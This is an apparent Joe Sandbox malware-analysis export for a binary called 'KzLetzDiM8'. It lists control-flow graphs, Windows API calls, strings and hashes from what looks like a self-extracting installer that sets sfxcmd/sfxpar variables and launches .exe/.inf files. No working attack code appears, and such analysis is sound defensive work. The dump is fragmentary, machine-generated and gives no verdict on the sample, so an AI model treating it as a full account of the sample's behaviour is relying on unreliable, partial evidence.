                                                            control_flow_graph 347 1fc73f-1fc757 call 1feb78 call 1fec50 352 1fd40d-1fd418 347->352 353 1fc75d-1fc787 call 1fb314 347->353 353->352 356 1fc78d-1fc792 353->356 357 1fc793-1fc7a1 356->357 358 1fc7a2-1fc7b7 call 1faf98 357->358 361 1fc7b9 358->361 362 1fc7bb-1fc7d0 call 1f1fbb 361->362 365 1fc7dd-1fc7e0 362->365 366 1fc7d2-1fc7d6 362->366 368 1fd3d9-1fd404 call 1fb314 365->368 369 1fc7e6 365->369 366->362 367 1fc7d8 366->367 367->368 368->357 381 1fd40a-1fd40c 368->381 371 1fca5f-1fca61 369->371 372 1fc9be-1fc9c0 369->372 373 1fc7ed-1fc7f0 369->373 374 1fca7c-1fca7e 369->374 371->368 375 1fca67-1fca77 SetWindowTextW 371->375 372->368 378 1fc9c6-1fc9d2 372->378 373->368 379 1fc7f6-1fc850 call 1fa64d call 1ebdf3 call 1ea544 call 1ea67e call 1e6edb 373->379 374->368 376 1fca84-1fca8b 374->376 375->368 376->368 380 1fca91-1fcaaa 376->380 382 1fc9e6-1fc9eb 378->382 383 1fc9d4-1fc9e5 call 207686 378->383 436 1fc98f-1fc9a4 call 1ea5d1 379->436 387 1fcaac 380->387 388 1fcab2-1fcac0 call 203e13 380->388 381->352 385 1fc9ed-1fc9f3 382->385 386 1fc9f5-1fca00 call 1fb48e 382->386 383->382 392 1fca05-1fca07 385->392 386->392 387->388 388->368 401 1fcac6-1fcacf 388->401 398 1fca09-1fca10 call 203e13 392->398 399 1fca12-1fca32 call 203e13 call 203e3e 392->399 398->399 424 1fca4b-1fca4d 399->424 425 1fca34-1fca3b 399->425 405 1fcaf8-1fcafb 401->405 406 1fcad1-1fcad5 401->406 411 1fcb01-1fcb04 405->411 413 1fcbe0-1fcbee call 1f0602 405->413 410 1fcad7-1fcadf 406->410 406->411 410->368 416 1fcae5-1fcaf3 call 1f0602 410->416 418 1fcb06-1fcb0b 411->418 419 1fcb11-1fcb2c 411->419 426 1fcbf0-1fcc04 call 20279b 413->426 416->426 418->413 418->419 437 1fcb2e-1fcb68 419->437 438 1fcb76-1fcb7d 419->438 424->368 427 1fca53-1fca5a call 203e2e 424->427 431 1fca3d-1fca3f 425->431 432 1fca42-1fca4a call 207686 425->432 446 1fcc06-1fcc0a 426->446 447 1fcc11-1fcc62 call 1f0602 call 1fb1be GetDlgItem SetWindowTextW SendMessageW call 203e49 426->447 427->368 431->432 432->424 453 1fc9aa-1fc9b9 call 1ea55a 436->453 454 1fc855-1fc869 SetFileAttributesW 436->454 464 1fcb6c-1fcb6e 437->464 465 1fcb6a 437->465 440 1fcb7f-1fcb97 call 203e13 438->440 441 1fcbab-1fcbce call 203e13 * 2 438->441 440->441 458 1fcb99-1fcba6 call 1f05da 440->458 441->426 475 1fcbd0-1fcbde call 1f05da 441->475 446->447 452 1fcc0c-1fcc0e 446->452 483 1fcc67-1fcc6b 447->483 452->447 453->368 460 1fc90f-1fc91f GetFileAttributesW 454->460 461 1fc86f-1fc8a2 call 1eb991 call 1eb690 call 203e13 454->461 458->441 460->436 470 1fc921-1fc930 DeleteFileW 460->470 490 1fc8b5-1fc8c3 call 1ebdb4 461->490 491 1fc8a4-1fc8b3 call 203e13 461->491 464->438 465->464 470->436 474 1fc932-1fc935 470->474 478 1fc939-1fc965 call 1e4092 GetFileAttributesW 474->478 475->426 487 1fc937-1fc938 478->487 488 1fc967-1fc97d MoveFileW 478->488 483->368 484 1fcc71-1fcc85 SendMessageW 483->484 484->368 487->478 488->436 492 1fc97f-1fc989 MoveFileExW 488->492 490->453 497 1fc8c9-1fc908 call 203e13 call 1ffff0 490->497 491->490 491->497 492->436 497->460
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 001FC744
                                                              • Part of subcall function 001FB314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 001FB3FB
                                                              • Part of subcall function 001FAF98: _wcschr.LIBVCRUNTIME ref: 001FB033
                                                            • _wcslen.LIBCMT ref: 001FCA0A
                                                            • _wcslen.LIBCMT ref: 001FCA13
                                                            • SetWindowTextW.USER32(?,?), ref: 001FCA71
                                                            • _wcslen.LIBCMT ref: 001FCAB3
                                                            • _wcsrchr.LIBVCRUNTIME ref: 001FCBFB
                                                            • GetDlgItem.USER32(?,00000066), ref: 001FCC36
                                                            • SetWindowTextW.USER32(00000000,?), ref: 001FCC46
                                                            • SendMessageW.USER32(00000000,00000143,00000000,0022A472), ref: 001FCC54
                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 001FCC7F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcschr_wcsrchr
                                                            • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                            • API String ID: 986293930-312220925
                                                            • Opcode ID: 8937651ff217a1907f9813c3ce64e13e7933ff7e83a0f38628b82b6426689237
                                                            • Instruction ID: 33bce2f14f7ce96513688ef7c90e09535ba54af67ef8afbbad038ef95e585f89
                                                            • Opcode Fuzzy Hash: 8937651ff217a1907f9813c3ce64e13e7933ff7e83a0f38628b82b6426689237
                                                            • Instruction Fuzzy Hash: D3E151B290021DAADB24DBA0ED85EFE73BCAF14350F4441A6F709E3051EB749A849F60
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 001EDA70
                                                            • _wcschr.LIBVCRUNTIME ref: 001EDA91
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 001EDAAC
                                                              • Part of subcall function 001EC29A: _wcslen.LIBCMT ref: 001EC2A2
                                                              • Part of subcall function 001F05DA: _wcslen.LIBCMT ref: 001F05E0
                                                              • Part of subcall function 001F1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,001EBAE9,00000000,?,?,?,00010412), ref: 001F1BA0
                                                            • _wcslen.LIBCMT ref: 001EDDE9
                                                            • __fprintf_l.LIBCMT ref: 001EDF1C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                                                            • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a$9!
                                                            • API String ID: 557298264-4042292296
                                                            • Opcode ID: 58a4b6d01276e65f8eded664a23decdee4209ead69e98027c6a95388c6785689
                                                            • Instruction ID: 01883b5c6bea6bcb43c5c3340c48475fa81d2ad80a227a3a697abc3b464ecc01
                                                            • Opcode Fuzzy Hash: 58a4b6d01276e65f8eded664a23decdee4209ead69e98027c6a95388c6785689
                                                            • Instruction Fuzzy Hash: E2320071A00688EBCF28EF65DC45AEE77E9FF18700F40011AFA0597291EBB19D95CB50

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 001FB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 001FB579
                                                              • Part of subcall function 001FB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001FB58A
                                                              • Part of subcall function 001FB568: IsDialogMessageW.USER32(00010412,?), ref: 001FB59E
                                                              • Part of subcall function 001FB568: TranslateMessage.USER32(?), ref: 001FB5AC
                                                              • Part of subcall function 001FB568: DispatchMessageW.USER32(?), ref: 001FB5B6
                                                            • GetDlgItem.USER32(00000068,0023FCB8), ref: 001FD4E8
                                                            • ShowWindow.USER32(00000000,00000005,?,?,?,001FAF07,00000001,?,?,001FB7B9,0021506C,0023FCB8,0023FCB8,00001000,00000000,00000000), ref: 001FD510
                                                            • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 001FD51B
                                                            • SendMessageW.USER32(00000000,000000C2,00000000,002135F4), ref: 001FD529
                                                            • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 001FD53F
                                                            • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 001FD559
                                                            • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 001FD59D
                                                            • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 001FD5AB
                                                            • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 001FD5BA
                                                            • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 001FD5E1
                                                            • SendMessageW.USER32(00000000,000000C2,00000000,002143F4), ref: 001FD5F0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                            • String ID: \
                                                            • API String ID: 3569833718-2967466578
                                                            • Opcode ID: f2e4188ea32006623509f51e174c5786058f13c9eddee07459d6a52a84bde9b6
                                                            • Instruction ID: 542460033557714eef84e850cf389323403dc04da0d6a5e67d79938a7fc77fb5
                                                            • Opcode Fuzzy Hash: f2e4188ea32006623509f51e174c5786058f13c9eddee07459d6a52a84bde9b6
                                                            • Instruction Fuzzy Hash: B5319E71145346BBE311EF20EC4EFAB7FACEB96708F000618F652D61A0DBA59A05C776

                                                            Control-flow Graph

                                                            APIs
                                                            • _wcslen.LIBCMT ref: 001FD7AE
                                                            • ShellExecuteExW.SHELL32(?), ref: 001FD8DE
                                                            • ShowWindow.USER32(?,00000000), ref: 001FD91D
                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 001FD959
                                                            • CloseHandle.KERNEL32(?), ref: 001FD97F
                                                            • ShowWindow.USER32(?,00000001), ref: 001FD9E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                            • String ID: .exe$.inf
                                                            • API String ID: 36480843-3750412487
                                                            • Opcode ID: 7c08cd0d062c75dddb3d9c9cc3c52ff343835b375a446849fa8e89bdc3acabd0
                                                            • Instruction ID: 482c568dea977895f6732502f242c030eac2c999609dc87d83278e95184554d4
                                                            • Opcode Fuzzy Hash: 7c08cd0d062c75dddb3d9c9cc3c52ff343835b375a446849fa8e89bdc3acabd0
                                                            • Instruction Fuzzy Hash: 6E51D471404388AADB31DF64F844BBBBBE6BF92788F04041EF6C5971A1D7B18985CB52

                                                            Control-flow Graph

                                                            APIs
                                                            • FreeLibrary.KERNEL32(00000000,?,?,00203C35,00000000,00000FA0,00242088,00000000,?,00203D60,00000004,InitializeCriticalSectionEx,00216394,InitializeCriticalSectionEx,00000000), ref: 00203C03
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: FreeLibrary
                                                            • String ID: api-ms-$c*
                                                            • API String ID: 3664257935-4049937915
                                                            • Opcode ID: 2ae113449d1440c2f35f313d0ef01b7d7b260774a7844e37068e86ebf3857f01
                                                            • Instruction ID: e774ad625e5cdab0132a35c35191254ff0b6d7b3f07d124c763cc14dd01ce8b8
                                                            • Opcode Fuzzy Hash: 2ae113449d1440c2f35f313d0ef01b7d7b260774a7844e37068e86ebf3857f01
                                                            • Instruction Fuzzy Hash: BA11E731A65322ABCB32CF689C4979D77A89F11778F150151E815EB1D1D770EF1086D0

                                                            Control-flow Graph

                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,002057FB,002057FB,?,?,?,0020ABAC,00000001,00000001,2DE85006), ref: 0020A9B5
                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0020ABAC,00000001,00000001,2DE85006,?,?,?), ref: 0020AA3B
                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0020AB35
                                                            • __freea.LIBCMT ref: 0020AB42
                                                              • Part of subcall function 00208E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00204286,?,0000015D,?,?,?,?,00205762,000000FF,00000000,?,?), ref: 00208E38
                                                            • __freea.LIBCMT ref: 0020AB4B
                                                            • __freea.LIBCMT ref: 0020AB70
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1414292761-0
                                                            • Opcode ID: 2fce1efb294112aee47056721821b27dc91117356dfb130f1293614c5265f559
                                                            • Instruction ID: ba294c1a113e9be18f205843cd81ac61d51daad1f58b248f6cff09ea3e4c64ad
                                                            • Opcode Fuzzy Hash: 2fce1efb294112aee47056721821b27dc91117356dfb130f1293614c5265f559
                                                            • Instruction Fuzzy Hash: 6E510472620317AFDB258F64CC41EBBB7AAEB64754F954628FC04D61C2DB34DCA0CA91

                                                            Control-flow Graph

                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,@ ,00000000,00000000,?,0020ACDB,@ ,00000000,00000000,00000000,?,0020AED8,00000006,FlsSetValue), ref: 0020AD66
                                                            • GetLastError.KERNEL32(?,0020ACDB,@ ,00000000,00000000,00000000,?,0020AED8,00000006,FlsSetValue,00217970,FlsSetValue,00000000,00000364,?,002098B7), ref: 0020AD72
                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0020ACDB,@ ,00000000,00000000,00000000,?,0020AED8,00000006,FlsSetValue,00217970,FlsSetValue,00000000), ref: 0020AD80
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: LibraryLoad$ErrorLast
                                                            • String ID: @
                                                            • API String ID: 3177248105-791083857
                                                            • Opcode ID: 8b628dabb21f61f5acab85cdb004a23c110398e40cd2b88f6ea21cd11cb1b7a6
                                                            • Instruction ID: e3d8cb6b987c405908bb1e098c98ad05921b183d146fa3de3944f0576ed44b64
                                                            • Opcode Fuzzy Hash: 8b628dabb21f61f5acab85cdb004a23c110398e40cd2b88f6ea21cd11cb1b7a6
                                                            • Instruction Fuzzy Hash: 8901F736631323ABC7218F68AC48A977BA8EF65BA27514624FD06D35D1DB30DC11C6E1

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 001F081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 001F0836
                                                              • Part of subcall function 001F081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,001EF2D8,Crypt32.dll,00000000,001EF35C,?,?,001EF33E,?,?,?), ref: 001F0858
                                                            • OleInitialize.OLE32(00000000), ref: 001FAC2F
                                                            • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 001FAC66
                                                            • SHGetMalloc.SHELL32(00228438), ref: 001FAC70
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                             • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                            • String ID: riched20.dll$3Ro
                                                            • API String ID: 3498096277-3613677438
                                                            • Opcode ID: 4d49d266858f1d79b3f062c9c476fad913a1b276a56eaed112f3687e35b5361f
                                                            • Instruction ID: 8984374d04f639fe471f3cb70ff878d4c278206dca1cd4449fad245a47ed9ee7
                                                            • Opcode Fuzzy Hash: 4d49d266858f1d79b3f062c9c476fad913a1b276a56eaed112f3687e35b5361f
                                                            • Instruction Fuzzy Hash: D7F044B5D00209ABCB10AFA9E8499EFFBFCEF95700F10411AA805A2241CBB456068BA1

                                                            Control-flow Graph

                                                             • Graph image not captured in this export; function 001E98E0-001E9A39. Block sequence: call 001FEC50; call 001E6EDB; CreateFileW; on failure GetLastError and call 001EBB03, then a second CreateFileW/GetLastError attempt; optional SetFileTime; call 001F0602; return.
                                                            APIs
                                                            • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,001E7760,?,00000005,?,00000011), ref: 001E995F
                                                            • GetLastError.KERNEL32(?,?,001E7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 001E996C
                                                            • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,001E7760,?,00000005,?), ref: 001E99A2
                                                            • GetLastError.KERNEL32(?,?,001E7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 001E99AA
                                                            • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,001E7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 001E99F9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                             • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: File$CreateErrorLast$Time
                                                            • String ID:
                                                            • API String ID: 1999340476-0
                                                            • Opcode ID: 766ac1eb4c18ba1c64f45afef57d9e9153d81ac12771541acb5a6df1f0c68905
                                                            • Instruction ID: 0fc5f6b0fe28cec4444fa592b317c8500a5b3df995bf93af66375aac6ac45c24
                                                            • Opcode Fuzzy Hash: 766ac1eb4c18ba1c64f45afef57d9e9153d81ac12771541acb5a6df1f0c68905
                                                            • Instruction Fuzzy Hash: 6B312430544B856FE730DF25CC4ABEEBBD4BB54324F100B19F9A1961D2D7B4A984CB91

                                                            Control-flow Graph

                                                             • Graph image not captured in this export; function 001FB568-001FB5BE. Block sequence: PeekMessageW; if a message is pending, GetMessageW, then IsDialogMessageW and, if not consumed as a dialog message, TranslateMessage/DispatchMessageW; return.
                                                            APIs
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 001FB579
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001FB58A
                                                            • IsDialogMessageW.USER32(00010412,?), ref: 001FB59E
                                                            • TranslateMessage.USER32(?), ref: 001FB5AC
                                                            • DispatchMessageW.USER32(?), ref: 001FB5B6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                             • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: Message$DialogDispatchPeekTranslate
                                                            • String ID:
                                                            • API String ID: 1266772231-0
                                                            • Opcode ID: ff7e0599f8adaaec8338789611bcd939583cdabf43a14de80c3234264cfa5eff
                                                            • Instruction ID: 7c36ff66666821851a2f729b08988f92ad3f290c68fbba41364ae1af37b76971
                                                            • Opcode Fuzzy Hash: ff7e0599f8adaaec8338789611bcd939583cdabf43a14de80c3234264cfa5eff
                                                            • Instruction Fuzzy Hash: D2F0D075A0121ABB8B20EBE5EC4CDEB7FBCEE067917004515F509D2010EB38D605CBB0

                                                            Control-flow Graph

                                                             • Graph image not captured in this export; function 001FABAB-001FAC01. Block sequence: GetClassNameW; call 001F1FBB (class-name comparison); FindWindowExW for a child EDIT control; SHAutoComplete on the resulting handle; return.
                                                            APIs
                                                            • GetClassNameW.USER32(?,?,00000050), ref: 001FABC2
                                                            • SHAutoComplete.SHLWAPI(?,00000010), ref: 001FABF9
                                                              • Part of subcall function 001F1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,001EC116,00000000,.exe,?,?,00000800,?,?,?,001F8E3C), ref: 001F1FD1
                                                            • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 001FABE9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                             • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                            • String ID: EDIT
                                                            • API String ID: 4243998846-3080729518
                                                            • Opcode ID: 49e3912482708dd3635d4e941a6f3c4d3dfa8d1c3ea9874fb150d684f3b9f2c5
                                                            • Instruction ID: 324bd3598c8080260042fede6f59c5cfa04d43208546e0c55d4e5e634604e75b
                                                            • Opcode Fuzzy Hash: 49e3912482708dd3635d4e941a6f3c4d3dfa8d1c3ea9874fb150d684f3b9f2c5
                                                            • Instruction Fuzzy Hash: F2F0827660022D76DB309664AC0AFEB76AC9F46B41F884111BA09A21C0D765DE46C5B6

                                                            Control-flow Graph

                                                             • Graph image not captured in this export; function 001FDBDE-001FDC38. Block sequence: call 001FEC50; SetEnvironmentVariableW (sfxcmd); call 001F0371; loop over call 001F048D; SetEnvironmentVariableW (sfxpar); return.
                                                            APIs
                                                            • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 001FDBF4
                                                            • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 001FDC30
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                             • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
